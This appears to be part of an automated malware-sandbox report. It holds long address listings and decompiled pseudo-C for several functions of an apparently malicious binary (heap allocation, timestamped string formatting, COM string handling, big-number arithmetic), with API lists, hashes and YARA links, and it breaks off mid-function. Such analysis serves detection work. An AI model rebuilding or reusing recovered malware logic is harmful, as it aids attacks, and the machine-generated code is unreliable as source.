                                                                                                                                                                                                                                0x736da8ad
                                                                                                                                                                                                                                0x736da8af
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da8b1
                                                                                                                                                                                                                                0x736da8b1
                                                                                                                                                                                                                                0x736da8b4
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da8b6
                                                                                                                                                                                                                                0x736da8b6
                                                                                                                                                                                                                                0x736da8b9
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da8b9
                                                                                                                                                                                                                                0x736da8b4
                                                                                                                                                                                                                                0x736da8af
                                                                                                                                                                                                                                0x736da953
                                                                                                                                                                                                                                0x736da954
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da8db
                                                                                                                                                                                                                                0x736da8db
                                                                                                                                                                                                                                0x736da8e1
                                                                                                                                                                                                                                0x736da8e9
                                                                                                                                                                                                                                0x736da8ee
                                                                                                                                                                                                                                0x736da8fd
                                                                                                                                                                                                                                0x736da8fd
                                                                                                                                                                                                                                0x736da905
                                                                                                                                                                                                                                0x736da90b
                                                                                                                                                                                                                                0x736da911
                                                                                                                                                                                                                                0x736da918
                                                                                                                                                                                                                                0x736da91b
                                                                                                                                                                                                                                0x736da91d
                                                                                                                                                                                                                                0x736da92d
                                                                                                                                                                                                                                0x736da932
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da826
                                                                                                                                                                                                                                0x736da826
                                                                                                                                                                                                                                0x736da82c
                                                                                                                                                                                                                                0x736da82d
                                                                                                                                                                                                                                0x736da82e
                                                                                                                                                                                                                                0x736da82f
                                                                                                                                                                                                                                0x736da837
                                                                                                                                                                                                                                0x736da837
                                                                                                                                                                                                                                0x736da95a
                                                                                                                                                                                                                                0x736da95a
                                                                                                                                                                                                                                0x736da961
                                                                                                                                                                                                                                0x736da962
                                                                                                                                                                                                                                0x736da96a
                                                                                                                                                                                                                                0x736da96f
                                                                                                                                                                                                                                0x736da970
                                                                                                                                                                                                                                0x736da782
                                                                                                                                                                                                                                0x736da782
                                                                                                                                                                                                                                0x736da785
                                                                                                                                                                                                                                0x736da787
                                                                                                                                                                                                                                0x736da79c
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da789
                                                                                                                                                                                                                                0x736da789
                                                                                                                                                                                                                                0x736da78c
                                                                                                                                                                                                                                0x736da78d
                                                                                                                                                                                                                                0x736da78e
                                                                                                                                                                                                                                0x736da78f
                                                                                                                                                                                                                                0x736da794
                                                                                                                                                                                                                                0x736da787
                                                                                                                                                                                                                                0x736da975
                                                                                                                                                                                                                                0x736da976
                                                                                                                                                                                                                                0x736da978
                                                                                                                                                                                                                                0x736da981
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da6ca
                                                                                                                                                                                                                                0x736da69b
                                                                                                                                                                                                                                0x736da69d
                                                                                                                                                                                                                                0x736da69e
                                                                                                                                                                                                                                0x736da6a2
                                                                                                                                                                                                                                0x736da6a2
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da5f7
                                                                                                                                                                                                                                0x736da5f7
                                                                                                                                                                                                                                0x736da5fd
                                                                                                                                                                                                                                0x736da600
                                                                                                                                                                                                                                0x736da603
                                                                                                                                                                                                                                0x736da606
                                                                                                                                                                                                                                0x736da609
                                                                                                                                                                                                                                0x736da60c
                                                                                                                                                                                                                                0x736da60f
                                                                                                                                                                                                                                0x736da60f
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da5c0
                                                                                                                                                                                                                                0x736da58e
                                                                                                                                                                                                                                0x736da58e
                                                                                                                                                                                                                                0x736da591
                                                                                                                                                                                                                                0x736da61e
                                                                                                                                                                                                                                0x736da61f
                                                                                                                                                                                                                                0x736da624
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da624
                                                                                                                                                                                                                                0x736da4c5
                                                                                                                                                                                                                                0x736da4c5
                                                                                                                                                                                                                                0x736da4c8
                                                                                                                                                                                                                                0x736da4d0
                                                                                                                                                                                                                                0x736da4d3
                                                                                                                                                                                                                                0x736da4da
                                                                                                                                                                                                                                0x736da4dc
                                                                                                                                                                                                                                0x736da4de
                                                                                                                                                                                                                                0x736da4f9
                                                                                                                                                                                                                                0x736da4fa
                                                                                                                                                                                                                                0x736da4fb
                                                                                                                                                                                                                                0x736da4fc
                                                                                                                                                                                                                                0x736da501
                                                                                                                                                                                                                                0x736da504
                                                                                                                                                                                                                                0x736da507
                                                                                                                                                                                                                                0x736da4e0
                                                                                                                                                                                                                                0x736da4e0
                                                                                                                                                                                                                                0x736da4e3
                                                                                                                                                                                                                                0x736da4e4
                                                                                                                                                                                                                                0x736da4e5
                                                                                                                                                                                                                                0x736da4e6
                                                                                                                                                                                                                                0x736da4e7
                                                                                                                                                                                                                                0x736da4ec
                                                                                                                                                                                                                                0x736da4ee
                                                                                                                                                                                                                                0x736da4f1
                                                                                                                                                                                                                                0x736da4f1
                                                                                                                                                                                                                                0x736da509
                                                                                                                                                                                                                                0x736da50b
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da514
                                                                                                                                                                                                                                0x736da517
                                                                                                                                                                                                                                0x736da51a
                                                                                                                                                                                                                                0x736da51c
                                                                                                                                                                                                                                0x736da51e
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da520
                                                                                                                                                                                                                                0x736da520
                                                                                                                                                                                                                                0x736da523
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da523
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da51e
                                                                                                                                                                                                                                0x736da599
                                                                                                                                                                                                                                0x736da625
                                                                                                                                                                                                                                0x736da628
                                                                                                                                                                                                                                0x736da62c
                                                                                                                                                                                                                                0x736da635
                                                                                                                                                                                                                                0x736da638
                                                                                                                                                                                                                                0x736da63c
                                                                                                                                                                                                                                0x736da63c
                                                                                                                                                                                                                                0x736da63e
                                                                                                                                                                                                                                0x736da641
                                                                                                                                                                                                                                0x736da643
                                                                                                                                                                                                                                0x736da645
                                                                                                                                                                                                                                0x736da647
                                                                                                                                                                                                                                0x736da64c
                                                                                                                                                                                                                                0x736da64d
                                                                                                                                                                                                                                0x736da651
                                                                                                                                                                                                                                0x736da651
                                                                                                                                                                                                                                0x736da655
                                                                                                                                                                                                                                0x736da658
                                                                                                                                                                                                                                0x736da658
                                                                                                                                                                                                                                0x736da65c
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da663
                                                                                                                                                                                                                                0x736da495
                                                                                                                                                                                                                                0x736da495
                                                                                                                                                                                                                                0x736da49c
                                                                                                                                                                                                                                0x736da49d
                                                                                                                                                                                                                                0x736da49f
                                                                                                                                                                                                                                0x736da664
                                                                                                                                                                                                                                0x736da66a
                                                                                                                                                                                                                                0x736da66a
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _free
                                                                                                                                                                                                                                • String ID: *?
                                                                                                                                                                                                                                • API String ID: 269201875-2564092906
                                                                                                                                                                                                                                • Opcode ID: 64ce4d84af9dd0348b0bdc1ed56a3b0106e437a61b3be5bb0858fc8ce406034e
                                                                                                                                                                                                                                • Instruction ID: 15dcc314aeeddb05f5ee9c0b6508e268adee9202471e1a7ab2ecf7d7b893703f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 64ce4d84af9dd0348b0bdc1ed56a3b0106e437a61b3be5bb0858fc8ce406034e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F615EB5D142199FDF15CFA9C9806EDFBF9EF48310B18816AD815E7380E635DE418B90
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A8462F, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 56%
                                                                                                                                                                                                                                			E00A8462F(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* __edi;
				intOrPtr _t18;
				void* _t24;
				void* _t30;
				void* _t36;
				void* _t40;
				intOrPtr _t42;

				_t36 = __edx;
				_t32 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t42 =  *0xa8d380; // 0x1ae9ba8
				_push(0x800);
				_push(0);
				_push( *0xa8d270);
				if( *0xa8d284 >= 5) {
					if(RtlAllocateHeap() == 0) {
						L6:
						_t30 = 8;
						L7:
						if(_t30 != 0) {
							L10:
							 *0xa8d284 =  *0xa8d284 + 1;
							L11:
							return _t30;
						}
						_t44 = _a4;
						_t40 = _v8;
						 *_a16 = _a4;
						 *_a20 = E00A8680B(_t44, _t40);
						_t18 = E00A82274(_t40, _t44);
						if(_t18 != 0) {
							 *_a8 = _t40;
							 *_a12 = _t18;
							if( *0xa8d284 < 5) {
								 *0xa8d284 =  *0xa8d284 & 0x00000000;
							}
							goto L11;
						}
						_t30 = 0xbf;
						E00A8651D();
						HeapFree( *0xa8d270, 0, _t40);
						goto L10;
					}
					_t24 = E00A8A565(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t13);
					L5:
					_t30 = _t24;
					goto L7;
				}
				if(RtlAllocateHeap() == 0) {
					goto L6;
				}
				_t24 = E00A870F4(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t25);
				goto L5;
			}











                                                                                                                                                                                                                                0x00a8462f
                                                                                                                                                                                                                                0x00a8462f
                                                                                                                                                                                                                                0x00a84632
                                                                                                                                                                                                                                0x00a84633
                                                                                                                                                                                                                                0x00a8463d
                                                                                                                                                                                                                                0x00a84644
                                                                                                                                                                                                                                0x00a84649
                                                                                                                                                                                                                                0x00a8464b
                                                                                                                                                                                                                                0x00a84651
                                                                                                                                                                                                                                0x00a84679
                                                                                                                                                                                                                                0x00a84691
                                                                                                                                                                                                                                0x00a84693
                                                                                                                                                                                                                                0x00a84694
                                                                                                                                                                                                                                0x00a84696
                                                                                                                                                                                                                                0x00a846d4
                                                                                                                                                                                                                                0x00a846d4
                                                                                                                                                                                                                                0x00a846da
                                                                                                                                                                                                                                0x00a846e0
                                                                                                                                                                                                                                0x00a846e0
                                                                                                                                                                                                                                0x00a84698
                                                                                                                                                                                                                                0x00a8469e
                                                                                                                                                                                                                                0x00a846a1
                                                                                                                                                                                                                                0x00a846b0
                                                                                                                                                                                                                                0x00a846b2
                                                                                                                                                                                                                                0x00a846b9
                                                                                                                                                                                                                                0x00a846ed
                                                                                                                                                                                                                                0x00a846f2
                                                                                                                                                                                                                                0x00a846f4
                                                                                                                                                                                                                                0x00a846f6
                                                                                                                                                                                                                                0x00a846f6
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a846f4
                                                                                                                                                                                                                                0x00a846bb
                                                                                                                                                                                                                                0x00a846c0
                                                                                                                                                                                                                                0x00a846ce
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a846ce
                                                                                                                                                                                                                                0x00a84688
                                                                                                                                                                                                                                0x00a8468d
                                                                                                                                                                                                                                0x00a8468d
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8468d
                                                                                                                                                                                                                                0x00a8465b
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8466a
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,00000800,747DF710), ref: 00A84653
                                                                                                                                                                                                                                  • Part of subcall function 00A870F4: GetTickCount.KERNEL32 ref: 00A87108
                                                                                                                                                                                                                                  • Part of subcall function 00A870F4: wsprintfA.USER32 ref: 00A87158
                                                                                                                                                                                                                                  • Part of subcall function 00A870F4: wsprintfA.USER32 ref: 00A87175
                                                                                                                                                                                                                                  • Part of subcall function 00A870F4: wsprintfA.USER32 ref: 00A871A1
                                                                                                                                                                                                                                  • Part of subcall function 00A870F4: HeapFree.KERNEL32(00000000,?), ref: 00A871B3
                                                                                                                                                                                                                                  • Part of subcall function 00A870F4: wsprintfA.USER32 ref: 00A871D4
                                                                                                                                                                                                                                  • Part of subcall function 00A870F4: HeapFree.KERNEL32(00000000,?), ref: 00A871E4
                                                                                                                                                                                                                                  • Part of subcall function 00A870F4: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00A87212
                                                                                                                                                                                                                                  • Part of subcall function 00A870F4: GetTickCount.KERNEL32 ref: 00A87223
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,00000800,747DF710), ref: 00A84671
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000002,00A8A0CB,?,00A8A0CB,00000002,?,?,00A858BD,?), ref: 00A846CE
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Heap$wsprintf$AllocateFree$CountTick
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 1676223858-1536154274
                                                                                                                                                                                                                                • Opcode ID: ed54f74b2764d9ad7047de0d59724e303378e49c5ba7c3085ab13a15fae6bf84
                                                                                                                                                                                                                                • Instruction ID: deb23f0e4b87eddedab8d30e6c6af6afe6fd5d18682c632d36c47b2883d09c9b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ed54f74b2764d9ad7047de0d59724e303378e49c5ba7c3085ab13a15fae6bf84
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E211A75200206EBDB01EF94DD84EDA3BBDAB49354F100026F906AB291EB70D9569BA1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A82EA6, Relevance: 6.2, APIs: 4, Instructions: 154memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 00A82EE1
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00A82FC6
                                                                                                                                                                                                                                  • Part of subcall function 00A86533: SysAllocString.OLEAUT32(00A8C2B0), ref: 00A86583
                                                                                                                                                                                                                                • SafeArrayDestroy.OLEAUT32(00000000), ref: 00A83019
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00A83028
                                                                                                                                                                                                                                  • Part of subcall function 00A8590A: Sleep.KERNEL32(000001F4), ref: 00A85952
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: String$AllocFree$ArrayDestroySafeSleep
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3193056040-0
                                                                                                                                                                                                                                • Opcode ID: fdf7c8da785c28ad077820cef8f8495720f13f33865cf1ac832b2bdb93decb7e
                                                                                                                                                                                                                                • Instruction ID: b4a6269a518729b995fad1ae47a415e23a7b56d542a12b41828048f78ef489a0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fdf7c8da785c28ad077820cef8f8495720f13f33865cf1ac832b2bdb93decb7e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 95516336900609EFDB11DFA8C844ADEB7B5FF88750F148828E945DB264DB71EE06CB60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A86533, Relevance: 6.2, APIs: 4, Instructions: 154memorystringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 46%
                                                                                                                                                                                                                                			E00A86533(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0xa8d2e0; // 0x105a5a8
					_t5 = _t103 + 0xa8e038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0xa8c2b0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0xa8d2e0; // 0x105a5a8
												_t28 = _t109 + 0xa8e0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0xa8d2e0; // 0x105a5a8
														_t33 = _t79 + 0xa8e078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}





































                                                                                                                                                                                                                                0x00a86538
                                                                                                                                                                                                                                0x00a86541
                                                                                                                                                                                                                                0x00a86542
                                                                                                                                                                                                                                0x00a86546
                                                                                                                                                                                                                                0x00a8654c
                                                                                                                                                                                                                                0x00a86552
                                                                                                                                                                                                                                0x00a8655b
                                                                                                                                                                                                                                0x00a86561
                                                                                                                                                                                                                                0x00a8656b
                                                                                                                                                                                                                                0x00a8656d
                                                                                                                                                                                                                                0x00a86573
                                                                                                                                                                                                                                0x00a86578
                                                                                                                                                                                                                                0x00a86583
                                                                                                                                                                                                                                0x00a86589
                                                                                                                                                                                                                                0x00a8658e
                                                                                                                                                                                                                                0x00a866b0
                                                                                                                                                                                                                                0x00a86594
                                                                                                                                                                                                                                0x00a86594
                                                                                                                                                                                                                                0x00a865a1
                                                                                                                                                                                                                                0x00a865a7
                                                                                                                                                                                                                                0x00a865ad
                                                                                                                                                                                                                                0x00a865b1
                                                                                                                                                                                                                                0x00a865b7
                                                                                                                                                                                                                                0x00a865c4
                                                                                                                                                                                                                                0x00a865c8
                                                                                                                                                                                                                                0x00a865ce
                                                                                                                                                                                                                                0x00a865d1
                                                                                                                                                                                                                                0x00a865d9
                                                                                                                                                                                                                                0x00a865da
                                                                                                                                                                                                                                0x00a865de
                                                                                                                                                                                                                                0x00a865e2
                                                                                                                                                                                                                                0x00a865e5
                                                                                                                                                                                                                                0x00a865e8
                                                                                                                                                                                                                                0x00a865ee
                                                                                                                                                                                                                                0x00a865f7
                                                                                                                                                                                                                                0x00a865fd
                                                                                                                                                                                                                                0x00a865fe
                                                                                                                                                                                                                                0x00a86601
                                                                                                                                                                                                                                0x00a86602
                                                                                                                                                                                                                                0x00a86603
                                                                                                                                                                                                                                0x00a8660b
                                                                                                                                                                                                                                0x00a8660c
                                                                                                                                                                                                                                0x00a8660d
                                                                                                                                                                                                                                0x00a8660f
                                                                                                                                                                                                                                0x00a86613
                                                                                                                                                                                                                                0x00a86617
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8661d
                                                                                                                                                                                                                                0x00a86626
                                                                                                                                                                                                                                0x00a8662c
                                                                                                                                                                                                                                0x00a86636
                                                                                                                                                                                                                                0x00a8663a
                                                                                                                                                                                                                                0x00a8663c
                                                                                                                                                                                                                                0x00a86649
                                                                                                                                                                                                                                0x00a8664d
                                                                                                                                                                                                                                0x00a86655
                                                                                                                                                                                                                                0x00a8665a
                                                                                                                                                                                                                                0x00a8666c
                                                                                                                                                                                                                                0x00a8666e
                                                                                                                                                                                                                                0x00a86674
                                                                                                                                                                                                                                0x00a86674
                                                                                                                                                                                                                                0x00a8667d
                                                                                                                                                                                                                                0x00a8667d
                                                                                                                                                                                                                                0x00a8667f
                                                                                                                                                                                                                                0x00a86685
                                                                                                                                                                                                                                0x00a86685
                                                                                                                                                                                                                                0x00a86688
                                                                                                                                                                                                                                0x00a8668e
                                                                                                                                                                                                                                0x00a86691
                                                                                                                                                                                                                                0x00a8669a
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8669a
                                                                                                                                                                                                                                0x00a865ee
                                                                                                                                                                                                                                0x00a865e8
                                                                                                                                                                                                                                0x00a865d1
                                                                                                                                                                                                                                0x00a866a0
                                                                                                                                                                                                                                0x00a866a0
                                                                                                                                                                                                                                0x00a866a6
                                                                                                                                                                                                                                0x00a866a6
                                                                                                                                                                                                                                0x00a866ac
                                                                                                                                                                                                                                0x00a866ac
                                                                                                                                                                                                                                0x00a866b5
                                                                                                                                                                                                                                0x00a866bb
                                                                                                                                                                                                                                0x00a866bb
                                                                                                                                                                                                                                0x00a86578
                                                                                                                                                                                                                                0x00a866c4

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00A8C2B0), ref: 00A86583
                                                                                                                                                                                                                                • lstrcmpW.KERNEL32(00000000,0076006F), ref: 00A86664
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00A8667D
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 00A866AC
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: String$Free$Alloclstrcmp
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1885612795-0
                                                                                                                                                                                                                                • Opcode ID: 3abd944f3dd64e6e1ad960e682c255e48e34cd0c38ce3f980baeb66558b06569
                                                                                                                                                                                                                                • Instruction ID: 5efb4718ca594a190fe35ac89d73778fb6885935ebb78fd112b937677df0d59e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3abd944f3dd64e6e1ad960e682c255e48e34cd0c38ce3f980baeb66558b06569
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B514C75D00519EFDB04EFE8C9889AEB7B9FF88705B144598E915EB214E731AD02CFA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A84EEE, Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 85%
                                                                                                                                                                                                                                			E00A84EEE(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E00A8650C(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E00A85450(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E00A87436(_t101,  &_v428, _a8, _t96 - _t81);
					E00A87436(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E00A85450(_t101, 0xa8d168);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E00A85450(_a16, _a4);
						E00A81072(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L00A8AEC0();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L00A8AEBA();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E00A86A23(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
